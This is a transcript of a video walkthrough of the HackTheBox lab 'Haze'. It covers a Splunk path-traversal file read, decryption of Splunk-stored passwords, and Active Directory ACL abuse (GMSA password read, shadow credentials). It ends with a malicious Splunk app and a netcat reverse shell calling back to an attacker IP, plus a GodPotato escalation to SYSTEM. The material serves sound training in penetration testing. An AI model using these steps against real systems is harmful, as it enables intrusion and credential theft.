What's going on YouTube? This is IppSec, and we'll be doing Haze from HackTheBox, which is a box I really enjoyed because it involves attacking a semi-hardened Active Directory domain. But before we get to AD, we discover an outdated version of Splunk that's running, and that is vulnerable to a file disclosure vulnerability, giving us the ability to leak the Splunk config and retrieve a password to get onto the domain. But the user we get access to doesn't have permission to list other users, and the next step is a password spray. So we can either perform a RID brute force to get a user list, but also domain users can add computers to the domain, and computers are still allowed to list users. So once we perform the password spray, you unlock a user that has WinRM access, and the next step involves finding an attack path that Bloodhound doesn't show. I'll show enumerating interesting domain ACLs with PowerSploit and also BloodyAD. This opens up an attack chain that lets us read the Splunk Backup config, which has the admin password for Splunk, allowing us to install a malicious Splunk app. And once we do this, we land on the server with SeImpersonate and can privesc with any of the recent potato attacks. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV, enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory, call it Haze, and then the IP address of 10.10.11.61. This can take some time to run, so I've already ran it. Looking at the results, we have 14 ports open. The first one is going to be DNS on port 53, and the banner tells us it's simple DNS plus. And whenever I see this, I always scan down and see if Active Directory is installed. We see it here, and we have the domain as haze.htb, and also the SSL cert tells us it's dco1.haze.htb. And we also have the common name here. This looks like Active Directory certificate services is set up just based upon the naming convention. But let's go ahead and edit our host file to add the DC and stuff. So I'm going to do AV etc host. Then I'm going to do 10.10.11.61. We're going to add the fully qualified. Oh, I did not mean to copy that. Let's do the fully qualified name of dco1.haze.htb. We'll do the NetBIOS name of dco1, and then just the domain name of haze.htb. I always like adding all three of those when I have a domain controller. But let's go to the next port. The next one is a Kerberos. Then we have RPC 135, 139, LDAP on 389, 445 SMB. We have more Kerberos, some Windows HTTP stuff, LDAP, another HTTP server on port 8000. And we see that is running Splunk HTTPD. So this is a little bit unique. We see the login over here. If we go to this, we can see what the page looks like. There we go, Splunk Enterprise. The default for Splunk Enterprise, if you Google it, is admin change me, and that's something I always test for as default logins, and that fails. So let's see what else we have. We have 8088, so let's go see what this port is. So 8088. Connection reset, I'm just going to try HTTPS. And that looks like it worked. Let's accept the certificate. And we just get a not found. And then we have 8089. So let's go take a look at this port as well. So 8089. And it looks like a Atom feed. I think this is just XML data. But the key thing is it's telling us something. I'm going to turn Dark Reader on. There we go. It's telling us the Splunk build is 9.2.1. So we actually have the version of Splunk here, and that is handy because if we go to the Splunk page on 8000, this was not HTTPS. Let's see. The copyright is 2025. If we Google this, 921 actually released in 2024. So the copyright looks like it's just being dynamically generated, so it's always showing the latest year, which is common, so you can't always depend on copyrights to get you like the year the software was released. But if we Google like Splunk 92, I don't know why that didn't copy. Let's do 921. I always like looking at the release notes to see exactly when something released. 9201 is February 8th, 2024, I think it said. Let's see, 9.2.1. There we go. It was released March 27th, 2024. So we have an idea of when this Splunk was released. And whenever I see that, I always like going to CVE details, and then we can search for the product, and then we can kind of look for CVEs around that time, right? So we can do Splunk. This is actually telling us the exact version. So I'm just going to do 921. It's got 39 vulnerabilities. I was hoping for a different one, maybe version details. There we go. So we have 2 XSS and 2024, a directory traversal as well, cross-site request forgery. I'm going to look at the directory traversal because that sounds more interesting than anything else. Cross-site scripting generally requires like user interaction, right? So I want to see exactly what this CVE is. So going here, Splunk Enterprise below that can perform directory path traversal on module messaging endpoint in this. Let's see. I was hoping to quickly find out like a chart that would tell me if this requires authentication or not. Maybe I don't use CVE details that much. Let's see, if we just Google this CVE, we got a POC there. Go to the NIST page as well. The thing I'm looking for is it unauthenticated, right? I'm guessing this vector would tell me if I could know that. Let's see. Zoom in a little bit. Privileges required, none. User interaction, none. Tech complexity, low. So doesn't seem like it requires authentication, right? If I go into one of the POCs, we can see kind of how it works. And I'm sure we could find a blog post on this as well, but it's pretty easy. It's just hitting this path and doing C:.. as like a directory traversal. I guess because this is Windows, that's why we do that. So let's see. Let's do curl. I'm going to do path as is. And I'm doing this because if I didn't do path as is, curl is automatically going to handle that directory traversal for us. Actually, maybe it won't since we're doing the C:. But let's just hit this. And I'm going to put the URL in single quotes. And we get data back. I'm going to remove path as is just to see. Because curl generally doesn't like the 2 dots. It's fine here. But if we did like this, then we definitely need the path as is because curl is going to normalize this and just say, I'm just going to get rid of these slashes. I wonder if we need the C:. That's my next thing I'm going to test. I'm guessing we do because that's a very odd thing to put in the payload. Yeah, so we definitely need that. So let's do this and we get to pass WD. Awesome. I wonder if we did another one. So I'm going to do C:.. and we get to the nothing. So let's see, C:.. I'm going to do a few more. And I'm going to assume I'm at the root of Windows now. And we can do Windows, and then is it like system 32 readme.txt or something? What is that? I forget exactly the path of it. Maybe it's the license, and I think it's actually RTF, not text. There we go. So yeah, we can go into the root of C, but the thing I want to look at is this pass WD. I think I added 2. Maybe I added only 1. So it looks like the proof of concept is getting us to a very specific directory. And Splunk, the actual agent kind of obeys a Linux convention once you get to the root. So there is a /etc, a /var, some other directories. Once we get on the box, maybe we'll look at it and make more sense. But this is just how Splunk is configured. So this pass WD, this isn't like a Linux etc pass WD. As we can see, the format is completely different. This is just a Splunk where it stores that, right? And we could try to crack these hashes, but nothing will crack for us. So I'm not going to waste time doing that. Another thing we could do if we thought we were maybe in some like type of Linux thing, etc hostname is also a file, and we get a 404 there. The 404 is whenever we see like HTML. So we can get Splunk configuration files. The other thing I want to see is, can we get like directory listings? And we can't. If we just do etc, we get the HTML. So if we Google like Splunk authentication file, and this just comes out knowing how Splunk works, right? And it takes a lot of Googling. If you weren't familiar with Splunk before, I imagine this will probably take you much longer than I'm showing you, because I kind of, I've dealt with Splunk a lot, and also I've solved this box before, so I kind of know the path, right? So we go to Splunk home, and then etc, and then we have the configuration file potentially in system default, and then authentication.conf is where I think it says, right? Authentication. Yep. So let's try this. Let's go etc system default authentication.conf. So this, and then authentication.conf, and we get a config. Awesome. So let's scroll up and we see, let's see anything useful in here. So password hashing algorithm doesn't look like anything. So this is just an etc default. Is there any other ones? I want to say there's like a /local, right? etc system local is another place. So let's go check that one out. So we can do etc system local authentication.conf. And this actually has a lot of data. We see a bind DN of Paul Taylor, and then we have this bind DN password. In Splunk, these passwords are going to be reversible. I always laugh that Splunk chose 7 because in Cisco, type 7 is a reversible format that is XOR. Splunk is just encrypted. It's not the same exact format, but it's funny that both of them chose 7 as the type, right? And there is a tool, let's see, decrypt Splunk password. I know you can pip X install it. I want to say it's like Splunk Secrets. Yeah. So you can do a pip X install Splunk Secrets, and this will get you the tool. I already have it installed. So if we do Splunk Secrets, and then, in order to decrypt it, we need to get the master key. So there's one more file we need. I'm going to just take note of this. So we'll call this splunk.hash, I guess. Paste that in. And then we need to get the Splunk secret file. And I think that's just an etc. Is either etc, maybe it's just splunk.secret. Whoops. Maybe secrets. Let's see. Splunk secrets file. It's probably also going to be in that GitHub. Splunk home etc auth. So etc auth splunk.secret. So etc auth Splunk secret, and there we go. We have that file. I'm just going to save it to splunk.secret, so we have it. And now we can use Splunk secrets -h -- help, and we want to do Splunk decrypt. So Splunk -decrypt, and then we need to specify the secret text. So we can do -s, and then we can specify the file. And I think we can just specify this Splunk.hash. Maybe not. Let's cat Splunk.hash. Maybe we need to actually copy and paste this. So we'll copy this. And we will paste it. And there we go. We got a password. Make sure you're doing it in single quotes. If you don't, then this is going to get translated as like a variable and you'll get no output. Watch. There you go. So always make sure you put it in single quotes when doing that. But we get a password here. So what we want to do is take note of that. And if we went back to the curl of the authentication.conf and local, we see the bind DN is Paul Taylor. So most likely this password goes to Paul Taylor, right? So let's go ahead and use username anarchy on Paul Taylor. And this will generate a bunch of potential usernames. And I'm just going to do usernames.txt. And now we can use netexec SMB 10.10.11.61, which is the IP of this box. -u, we'll do usernames.txt -p. I'll give it passwords.txt, even though it's just one. And then we're going to run this and see if any of the usernames hit. We could have also probably used like Kerberos and done the user enum to find a valid username format. But since we had the password already, might as well, right? And we get the credential right here. So we have Paul Taylor's creds. So I'm just going to do creds.txt. We have that. And then let's do -u. Let's actually say Paul.Taylor and then -p. Let's go ahead and add this. Okay. and we got authenticated. Awesome. So my first thing normally is to do like a -- users to list all the users on the domain. So running this, it looks like it is running and we only get one, which is odd. We don't even have like administrator. All the default ones aren't shown. And in Active Directory, you can actually prevent users from doing a directory listing, right? We could try like RID brute, and this is going to brute force users through the RID. And this is going to get us a list of users and groups on the box, but there is another trick we can do. The RID brute force is the intended way to do it. We see an interesting group right here that's going to be interesting later, GMSA manager. But this is the intended way. There is the second way, this way I did it. In Active Directory, you can normally prevent users from listing users unless like you do Exchange and you want them like the mailbox and things to work. But it's very hard to prevent a computer object from being able to query users because it needs to be able to translate SIDs and do all of that, right? And low privilege users can normally add machines to a domain. So we can use the AddComputer from Impacket. We're going to add a computer account. Then we're going to use the computer account to query a list of users without the RID brute force. And what that's going to buy us the ability to do is run RustHound, right? Because if we just ran RustHound as a Paul Taylor user, it's not going to get much information because it doesn't have a lot of permissions in Active Directory, right? We can do the RID brute, but RustHound doesn't really care about that. That's just enumerating if the user is valid. We can't look into what things they can do. So in order to run RustHound, we want to be able to get that computer account. So let's go ahead and do that. So I'm going to use AddComputer, and then we're going to give it the computer name, and this can be anything we want. I'm just going to do IPsec, right? And then we're going to give it the password. Again, anything we want. I'm just going to do please subscribe, bang. And then the DC host, I already set up my passwd file, so this should be fine, of haze.hdb. And then the domain net BIOS we need is just going to be Haze. And then authentication is Haze Paul.Taylor. And then we need creds. Let's go ahead and grab this. So we can grab this password, paste that in. And I think that's all we need. We'll run this. It's thinking. And there we go. Successfully added machine account IPsec with password please subscribe. So now we can go back to our netexec, and I'm going to specify IPsec with $1. And then we're going to do please subscribe, bang. And make sure we can authenticate. And then once we can, I'm going to do -- users like this. And hopefully we get a list of all the users on the box. So now that we have this, I'm going to get a TGT, and then we'll use RustHound in order to start our Bloodhound. And the reason why I'm going to use TGT is because RustHound actually, I had a lot of trouble authenticating with just a computer account. It looks like it's kind of hard-coded to use user accounts. But if we do the TGT, we can just pass the ticket in and then have it work that way, right? So let's do that. Now, RustHound is going to use our local Kerberos config. So we have to generate a KRB file. So we're going to do a netexec again, and we'll do generate-krb 5-file. I'm going to call it haze.krb. And all this file does is just tell our Linux machine how to talk to the domain, right? If we cat it, we can see that's the file. I'm going to do sudo cp haze.hdb etc krb5.conf. And now we have that. Let's now do a get TGT. So we can do get TGT. Is it haze.htb? I think there's going to be in single quotes, then IPsec like this, colon, please subscribe. And then at, what is it? DC01 haze.htb. Empty domain not allowed. We have the domain. Maybe it wants a / clock skew. So our timing is off from the domain controller. If we went all the way back in nmap, it does tell us that. Let's see. It should have. There we go. Clock skew. Right? We have an 8-hour time difference. So I'm just going to do sudo ntp date of 10/10/11/61. And this is going to sync our time up with that. And then we can run this get tgt again. We're going to get the ticket now. And hopefully after this, we'll be able to run Bloodhound. So I'm going to do a Kerb5cc name is equal to my cc cache file. Then we can do RustHound community edition, specify -k for Kerberos. Collection method is all. Domain is haze.htb. And I want to zip it up. And we need the -f to specify the domain. So we'll do, I think it was dco1.haze.htb. It may have just been DC. No, looks like it was dco1. And there we go. We have RustHound now dumping everything. If we do a ls, we have the zip here. So let's go ahead and start up Bloodhound. So I'm going to go to opt Bloodhound server is where I have it installed. Docker compose up -d. And that's going to start up Bloodhound. And I'm going to wait for this start, and then we'll be able to log into Bloodhound. Okay, it looks like it has been started. So now let's go to 127.0.0.1, port 8088. And I'm going to go ahead and upload the data. So I'm going to go to upload files. And then let's see. Does this open this? There we go. Go here. And we will drag and drop this zip. Click upload. And that's going to take some time to ingest. While that does, I'm going to go ahead and run the --users command again. And we're going to list all the users because one of the steps is going to be doing a password spray. And I'm just going to build the list while Bloodhound ingest. So this will just save time, make it easier for me to record. So let's go ahead and grab all this. Let's go users.temp, I guess. That's not it. There we go. Save it. And let's see. Did I not save? It's there. Okay. I don't know what I was doing, but we have it there. Now, 1, 2, 3, 4, 5. We want the 5th field. So we'll do an awk print $5. There we go. I'm going to direct this to users.text. And we can remove the users.temp because we no longer need it. Interesting enough, almost every password is set at the same exact time. These are a second off of this, but once the computer boots up, it looks like it sets all the passwords. So now that we have that, is our Bloodhound data ingested? It is. We can go ahead and explore to see if we have anything. So let's see. The first thing I would probably do, we have Paul Taylor, right? So we can see what this user is. Click on it and see outbound control, what Paul Taylor has access to. They're a member of domain users that has enroll on some certificates, and none of these are dangerous certificates. If it was part of like an ADCS attack path, it would tell us. And then we look, we're a member of authenticated users. We can look at all of our groups here. Our certificate services, users, authenticated, everyone, Splunk, LDAP, auth, pre-Windows 2000 domain users. We could potentially, I never tried this, but if I'm in the Splunk group, I may be able to log in. So we do username Paul Taylor and password. What was Paul Taylor's password? Paul Taylor, this LDAP auth Splunk. Let's copy, paste. Login failed. We could try like at haze.htb. I I think Etsy passwd just said Paul, right? Let's see, passwd. Is that it? Let's see, what was it? It just said Paul, but that still didn't work. So we can't log in. So it looks like this isn't set up for LDAP auth maybe. I don't know exactly, but can't log in there. Let's go back over to Bloodhound and see other things. If we went to cipher queries and did some of these, like shortest path to tier 0 high value targets, run it, we don't really get anything. We could go around gold insert, but that's, again, all high privilege. What group is this? Domain administrator. That's administrator. So there's really not all much we can get from this cipher queries. We could spend more time here and potentially discover things, but we had a list of users, so let's try doing the password spray, right? So if I did my cat users.txt, we have a list of users here. So let's do NXC, SMB, 10, 10, 11, 61, users.txt, P, and I have that Splunk password in here already. So I'll just save that, or save me from copy and pasting it. We see it there. And we also want to do continue on success, because as soon as it gets a success, it stops. And it stopped on Paul Taylor. We already knew that. So I'm going to run it again. And now we see Mark Adams as well. So we got a second account. Let's see Mark Adams real quick. So we can do Mark Adams. And I probably should be setting these accounts to owned as I go. It's a habit I'm not in. Let's add to owned. There we go. Outbound object control kind of looks the same, right? Yep, that looks the same. Member of. We can see domain users, remote management. We weren't in that before. This will allow us to do WinRM. Certificate service. We got this GMSA managers, which is a new account, a new group we haven't seen. So if we look at what this group is, we have inbound object control. It doesn't look like it has any permissions according to Bloodhound, right? But this group has to do something. This GMSA managers. If I search for GMSA, it's just this. So let's now, let's see, what can we do? I guess we should be logging into the box. So I'm going to use evil winrm -I 10 10 11 61 -u Mark Adams -p, and let's cat this password like this. Okay. And now we are on the box. So the first thing I'm going to do is run a command called Get-ADServiceAccount. And the reason why I'm running this is because we had this group that we're a member of, the GMSA managers, which is group managed service accounts, but we don't know what the group managed service account is, right? We could probably just manually look through Bloodhound data and figure it out. But this query is just going to list them all, right? So we do this and we can see there is an account called Haze IT Backup. And if we look at this, so we do Haze IT Backup, we see there is an account here, and we can see it's a member of, we got outbound control. It looks very similar to what we have, but it does have right ownership over to this support service at haze.htb. And if we look at what support service can do, it looks like it can add a credential link over to Edward Martin. So we can get access to this account, which if we look at Edward Martin, they're a member of the backup reviewers group. So I think this is going to be the end goal, is getting over to Edward Martin. So we want to take over this account somehow. So let's see. We're a member of the group. You may think we could just from Mark. Let's do cat users and cat password, NXC, LDAP 10.10.11.61-U, Mark Adams-P. We'll put this password in. And then add the GMSA. You may think since we're a member of the weird GMSA group that would be able to read the password, but it doesn't look like we can. And we'll get into that in just a minute, right? NTLM, no permissions. So let's see. What I want to do is run PowerView. So there's probably 3 ways we can do it. I'm going to show you PowerView and BloodyAD. But if we use PowerView, I'm going to do -H real quick because I want to set my scripts directory of opt PowerSploit recon. There we go. And we will copy this real quick. It's going to take a little while to load PowerView. But I also want to show if we were doing some enumeration and we went to CD /, did a dir. We went to backups. We see we don't have any permission inside of this directory. I don't think we can even like iCackles to view that. iCackles backups. We just get access is denied. But it's reasonable to think members of the backup reviewers have access to this backups directory, right? So PowerView isn't working. Well, PowerView will work for us. It's just taking a while to load. We can do BloodyAD. So I'm going to show that real quick. We'll do BloodyAD host DC01 Haze HTTP. Specify the domain, user, Mark Adams. We need to get the password. Copy this. So -P for password. And then I think it's get writable. And I think we need a --detail. And this is going to show me everything Mark Adams has write access to. So we can see write access to myself, whatever this foreign security principal is. And then we have write access to this MSDS group MSA membership. So since we can write here, this is what's going to enable us to allow a privilege to read passwords. So that's one way we could do it, is just running the get writable and see, oh, we can write to this permission bit that will allow us to read GMSA passwords. Now that we have PowerView loaded, we can pretty much do the same thing, right? That'd be a Find-InterestingDomainACL and then resolve GUIDs. And if we run this, it's going to show pretty much every interesting GUID. This may take a little bit to run. I may regret hitting enter there. But essentially, this is what Bloodhound is using to build all those edges for all the paths, right? It just doesn't know about this group MSA membership right. If we had generic right to this, it would probably show us we could read GMSA passwords. It's just not, I guess, fine-grained enough to understand this particular permission bit. But I'm going to pause the video and we're going to wait for this. Oh, maybe not. Maybe it just finished. There we go. So we can see all the permissions. We have a lot of permissions on the IPsec computer because we added, actually, it's not us. We can see Paul Taylor has access over it. So this is showing all the interesting domains. What we want to do, though, is just filter on what we find interesting, right? So we're going to ask it the question by doing a pipe, and then we'll say where the identity reference name is going to match the group we want, which was GMSA managers. So we'll say -match GMSA managers. I don't know if it's capital or not. We'll see. Or case sensitive, I guess I should have said. But hopefully this now gets us the interesting ACL. I don't know what the casing was on this. Does it say in Bloodhound? GMSA managers is all capital there. SAM account name. This is how it's cased. So I'm going to pause the video and I'll resume when this command finishes. It normally takes like 30, 45 seconds, I think. Awesome. And it is done. We see the reference name GMSA managers has write property over this object. It's pretty much the same exact thing as BloodyAD told us, except with BloodyAD, we could have just specified the user we are and say, hey, what do we have write access to? With PowerView, with Find-InterestingDomainACLs, we have to be a little bit more particular, right? Because if I just did Mark Adams here and we hit this, I'm going to pause the video, let this finish, but I think there's no interesting ACLs for us because it's not going to be recursing into all the groups. I'm sure there is a flag to do that, but I just wanted to highlight it. And now that it's done, we can see there was no output from that. So what we want to do is a set-AD-service-account and specify the GMSA account, which was, I think, Haze IT backup right here. So we can do this and then set the principals allowed to retrieve managed passwords. And that's going to be Mark Adams. And this is going to enable us to use that read GMSA. I guess I have to spell it correctly. Let's see. Is it principal? I think it's principals allowed to. I guess I'll copy and paste this. Set AD service account. Make sure we use Google. Principals allowed to retrieve managed password. Okay, so we don't have any output there, and that is good. So if I now go back here, and I don't know where it was. Oh, right here, this GMSA. This is the same command I ran before, but now when we run it, what? Here's IT backup. Run it. There we go. We get it. I'm guessing maybe like machine hygiene or something like set this back like as I did this. Maybe I did it like on the minute and it undid the change it did. But there we go. We have the NTLM password right there. So now we can log in with this Haze IT backup. So if I do a, let's do NXC SMB 10 10 11 61 -U dash, I think it's dash capital H for hashes. Let's copy this. Paste. And let's see. We have a successful authentication. So let's see what this account can do. So I'm going to go look at Haze IT backup. And we already saw this. We looked at it before, and this user could get to Edward. I'm just going to show it this way so we can see everything on one graph and say what we have to do. So we have write owner over this support services, which then will allow us to force change password here. So with write owner, we can do multiple things. So let's say the notes. So what we're going to do first is, well, write owner, right? And then the second thing we want to do is we're going to modify it to allow GenericAll. And then once we have that, we can add ourselves to the group, right? So in order to abuse it, we have to do three things here. And then once we're in this group, we'll be able to add a credential link to Edward Martin. And we're going to use Certipy for that. So we'll do shadow cred to Edward Martin, right? So those are pretty much the steps. So we'll do BloodyAD, host, DC01, Haze HTTP, D Haze.htb, U, Haze IT backup, -P, and let's go ahead and grab that NTLM hash again. Like this. And then we can do set owner. It was support services. And then Haze IT backup. So we're adding ourselves to be the owner. Okay. And then the next thing we need to do is allow GenericAll. So we can say add GenericAll support services Haze IT backup. There we go. And finally, we want to do an add group member. So we'll do add group member support services Haze ID backup. Is this wrong? Group. I screwed something up. Case sensitive. M is capital right there. There we go. Haze IT has been added to support services, and we could also use BloodyAD to create the shadow credential for us, but I don't think it actually gives us the NTLM hash. It gives us a certificate back that we can use like get TGT or something to get a certificate or an NTLM hash. I really just like using Certipy at this point. So we'll do Certipy, shadow, auto, username, Haze IT backup at haze.htb, hashes. I got to get that password hash again. So I'm going to go ahead and grab this. And then the account was Edward Martin. The target, we need to specify the fully qualified name of DC01 Haze HTB. And then I'm going to add the name server 10101161. I think that's all we need. I forgot a quote somewhere. And let's see if this works. If it doesn't work, I'm going to redo all the steps. So set owner, and then we wanted to GenericAll, and then group member. And now let's try Certipy again. That hygiene really makes it annoying when it undoes the changes you've been doing. But if you do it quick enough, you can get them all done. And now we're getting a TGT. And hopefully in just a second, we will have the NTLM hash to Edward Martin. And then we'll be able to use evilwinrm to log in as him. So there we go. We have this hash. And we can do evilwinrm -I 10101161 U Edward Martin. I think -H again for hashes. And there we go. We're logged in. And remember, in Bloodhound, we already looked at this. But if we do a whoami/all, it's going to show us the groups. And one of the groups was backup related, right? There we go. Backup reviewers. So I'm going to go back into the CD /. Let's go into backups, do a dir. Now there's a Splunk backup, dir here, and there's a zip. So I'm going to do a download to download this backup, and it's going to take probably about 1 to 2 minutes to download. So I'm going to just pause the video and we'll resume when it's done downloading. Okay, the download is now done. So I'm going to go ahead and extract it. So I'm going to make a directory called backup. We'll go in there, and then we'll do a 7-zip extract. And the file was what? Splunk something.zip. 7zx for extract. There we go. So now we have the directory. If we just do a find.-type f, we can look at all the files here, and it is the Splunk installation. We got a lot in var. It looks like we had etc as well. Let's go into Splunk. Let's cat etc splunk.secrets. It was etc auth splunk.secret. So this is the secret of the backup. If I cat .. of my splunk.secret, we can see the secrets differ. So we know this is a different installation. What we can also do is a recursive grep. So I'm going to do grep or capital P. This is going to give me regular expression. And I'm going to search for all password hashes because we had that var directory, we have the etc directory. There's a lot of places it could be. So I'd rather just search for a string that has a dollar, then a digit, and then another dollar, then any non-white space character 15 or more times. We'll terminate that. And there we go. We have a few things. So etc passwd has this admin. Inputs example. So these are examples. We can probably ignore those. Local authentication. We have a bind DN password. It's $1. And this one is also going to be reversible. We also have this symmetric key and SSL password. So let's look at the bind DN password. So I'm going to use the Splunk Secrets again. And $1 is actually the legacy. So we'll do a Splunk legacy decrypt. I think it's like $S and then ciphertext, right? Yeah. So we'll do $S and then was it auth splunk.secret and then ciphertext. Paste that in. And remember, we have to put that in quotes. Maybe etc auth splunk.secret. There we go. So we have admin, Splunk admin 2K24. Let's see what that file was again. Where was that? Where do we just decrypt it out of? The bind password for this. So let's do a less Alexander Green. So we could try logging in as them. Where is that? Copy. Probably have it here, right? NXC. We can do Alexander Green. Hopefully I spelled that correctly. Paste. And we'll see if this lets us on the server. It does not. Alex. I'm just going to copy and paste this real quick. But I think I typed it right. So it doesn't work for this account. It is the Splunk admin password. So we can also try it in Splunk itself. So if we go to login, we can do admin, put in this password. I wonder if it was in like passwd as well. I'm not sure. Where's that grep command? Grep admin. So I bet if we had cracked this, if we send this to netcat, this would probably translate to that password. So that's how we could do it. This is probably the running config. The username's here. If we cat etc passwd, it's only got one user, admin. So that could also be how you know what the user is for Splunk. And now once we log in, we're an admin on Splunk. And what we can do is manage apps and install a malicious application. So I'm going to Google Splunk reverse shell app, maybe. Go to Google. Go to the reverse shell Splunk. And this is the one we're going to use. So I'm going to do a git clone just to download it. And it gives simple instructions. We just to modify the PowerShell and then zip it up. Right? So it gives the tar and this. So let's go into the reverse shell. Okay. And if we go default inputs.conf, we don't have to do this. I'm just going to do it. The Python is for when it's Linux. The bat is for when it's Windows. I'm just going to delete the Linux because we know we're on Windows. So we have that done. And then if we go to bin, if we look at run.bat, it's just going to execute the PowerShell. So v bin run.ps1. And we see it just wants us to put the IP address and port. So I'm going to do 10.10.14.8. And then my port is going to be 9001. And I'm going to save that. And then we just want to follow the instructions to tar it up. So I'm going to copy this, paste, and did that error? No such file or directory, because I in one too deep. So let's delete what we had just made. There we go. Okay. So we tar that. Now we want to rename it to be Splunk reverse shell.spl. I'm not sure why they didn't just name it from the tar command. That move command is completely unnecessary. But now that we have the app, we can install from a file, browse, and actually before I do this, let's do rl wrap nc lvnp 9001. I don't have rl wrap. Let's just do netcat. Okay. And we want to do HTTP, Haze, reverse shell Splunk. I guess I'm here. Where'd I save that file? I am in reverse shell Splunk. Okay, there it is. I swear I did not see this file just a second ago. Upload, waiting for it to come back. There we go. Connect. And we do whoami/all. We can see we have the SeImpersonate Privilege. So we should be able to use a potato. And we're Alexander Green. So let's now go ahead and I'm going to download I think GodPotato is the latest one. There's so many potatoes. I think like sweet potato would work. I think maybe juicy potato NG may work. I'm just going to use GodPotato. They're all just various tools to exploit the SeImpersonate privilege. So let's go ahead and download GodPotato Net 4. Do I have a dub already? I don't think so. So we'll do make dir dub, go in here, wget, and then I'm also going to download netcat because we'll need that to send the shell easily. So I'm going to do netcat Windows, and if you download like the first result off of GitHub, it doesn't actually have the -e. I know I wasted a little bit of time playing around with this, and then I read the instructions, and it says like, I think this one has it removed. Maybe not. There is a netcat that has it removed. This doesn't have a release, so this is not it. Let's see. Eternally bored. There we go. Maybe it's just like NC64 Windows I had Googled. I Googled something and got something I normally don't. Vin's World. So if you go here and download this netcat, it's not going to work. If we look at it, let's see. But the -e gaping security hole option. So it looks like they removed that. So don't use this one. I used it because I saw it on GitHub. It had a Windows version. I downloaded it and was confused why I wasn't getting a shell. You want to use the one off of Eternally Bored. I'm just going to download this link. wget. And it's probably on Parrot somewhere. I don't know though. 7Z. I forgot the X again to extract. There we go. And we have nc64.exe. Awesome. So we have GodPotato and nc. So I'm going to go to cd program data. I'm just going to do a curl http 10.10.14.8 port 8000 python 3 http server. Let's download this. And the output, I'm just going to call it gp.exe for GodPotato. And then I'm also going to download netcat64. So copy nc64.exe, and I'll just call it nc.exe. Okay. So we can do nc lvnp 9001. And then going back to GodPotato, we'll see how to use it. It just wants GodPotato, cmd, and then the command. And they do full path to, They're not doing full path there, but I will. So let's see. We'll do /gp.exe-cmd and then c:\program data nc.exe 10.10.14.8 9001, and we're going to send cmd.exe. So run this, and there we go. We get a shell here. If I do who am I, nothing, but we'll probably NT authority system. So cd/users administrator desktop, and then type root.txt. There we go. We can get it. I don't know why the who am I command's not working. That's actually a little funny. It's got to be somehow it's doing the impersonation thing, and the token it gives us isn't compatible with who am I, which is weird. But a lot of weird things happen when you do token impersonation. I'm just going to try PowerShell real quick, and then we'll wrap up the video. So we can do this, PowerShell.exe. Did PowerShell not work? Is it going to make me find where PowerShell is? That's always annoying. So maybe PowerShell doesn't allow us to use impersonation. If I do something that doesn't exist, do we get a connection? We do, and it hangs. So PowerShell is definitely doing something. And okay, sweet. I was worried that everything hung. So what I was testing there is, what was I going to say? If I just got a connection that closed, then I would be thinking, oh, it doesn't know the path to PowerShell. But no, it knows the path to PowerShell. PowerShell is just exiting immediately. What if I do PowerShell here? Nothing happens. So it's got to be something along with the token it is requesting doesn't have privilege to run some things. It's really weird token shenanigans in Windows, but that's going to be the video. Hope you guys enjoyed it. Take care, and I will see you all next time.